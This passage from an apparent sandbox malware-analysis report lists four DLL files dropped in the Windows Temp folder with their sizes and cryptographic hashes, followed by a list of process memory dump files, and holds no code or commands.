  SHA512 f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e

\Windows\Temp\trch-1.dll (58KB)
  MD5    838ceb02081ac27de43da56bec20fc76
  SHA1   972ab587cdb63c8263eb977f10977fd7d27ecf7b
  SHA256 0259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
  SHA512 bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22

\Windows\Temp\trfo-2.dll (29KB)
  MD5    3e89c56056e5525bf4d9e52b28fbbca7
  SHA1   08f93ab25190a44c4e29bee5e8aacecc90dab80c
  SHA256 b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
  SHA512 32487c6bca48a989d48fa7b362381fadd0209fdcc8e837f2008f16c4b52ab4830942b2e0aa1fb18dbec7fce189bb9a6d40f362a6c2b4f44649bd98557ecddbb6

\Windows\Temp\tucl-1.dll (9KB)
  MD5    83076104ae977d850d1e015704e5730a
  SHA1   776e7079734bc4817e3af0049f42524404a55310
  SHA256 cf25bdc6711a72713d80a4a860df724a79042be210930dcbfc522da72b39bb12
  SHA512 bd1e6c99308c128a07fbb0c05e3a09dbcf4cec91326148439210077d09992ebf25403f6656a49d79ad2151c2e61e6532108fed12727c41103df3d7a2b1ba82f8

\Windows\Temp\ucl.dll (57KB)
  MD5    6b7276e4aa7a1e50735d2f6923b40de4
  SHA1   db8603ac6cac7eb3690f67af7b8d081aa9ce3075
  SHA256 f0df80978b3a563077def7ba919e2f49e5883d24176e6b3371a8eef1efe2b06a
  SHA512 58e65ce3a5bcb65f056856cfda06462d3fbce4d625a76526107977fd7a44d93cfc16de5f9952b8fcff7049a7556b0d35de0aa02de736f0daeec1e41d02a20daa

Memory dumps (pid-sequence-range)
  memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp      9.0MB
  memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp      9.0MB
  memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp      9.0MB
  memory/384-13660-0x0000000000400000-0x0000000000D0A000-memory.dmp   9.0MB
  memory/384-13645-0x0000000000400000-0x0000000000D0A000-memory.dmp   9.0MB
  memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp   9.0MB
  memory/936-93-0x00000000033B0000-0x0000000003CBA000-memory.dmp      9.0MB
  memory/936-33-0x0000000000400000-0x0000000000409000-memory.dmp      36KB
  memory/936-32-0x0000000000400000-0x0000000000409000-memory.dmp      36KB
  memory/936-4167-0x00000000033B0000-0x0000000003CBA000-memory.dmp    9.0MB
  memory/936-61-0x00000000033B0000-0x0000000003CBA000-memory.dmp      9.0MB
  memory/936-59-0x00000000033B0000-0x0000000003CBA000-memory.dmp      9.0MB
  memory/2096-1-0x0000000010000000-0x000000001001A000-memory.dmp      104KB
  memory/2096-0-0x0000000000400000-0x0000000000420000-memory.dmp      128KB
  memory/2336-44-0x0000000001C10000-0x0000000001C94000-memory.dmp     528KB
  memory/2336-27-0x0000000001C10000-0x0000000001C94000-memory.dmp     528KB
  memory/2336-26-0x0000000001C10000-0x0000000001C94000-memory.dmp     528KB
  memory/2336-7-0x0000000000400000-0x0000000000420000-memory.dmp      128KB
  memory/2336-46-0x0000000001C10000-0x0000000001C94000-memory.dmp     528KB
  memory/2844-29-0x0000000000400000-0x0000000000484000-memory.dmp     528KB
  memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp     528KB
  memory/3140-12812-0x00000000000E0000-0x00000000000F1000-memory.dmp  68KB
  memory/4948-13644-0x00000000000F0000-0x0000000000101000-memory.dmp  68KB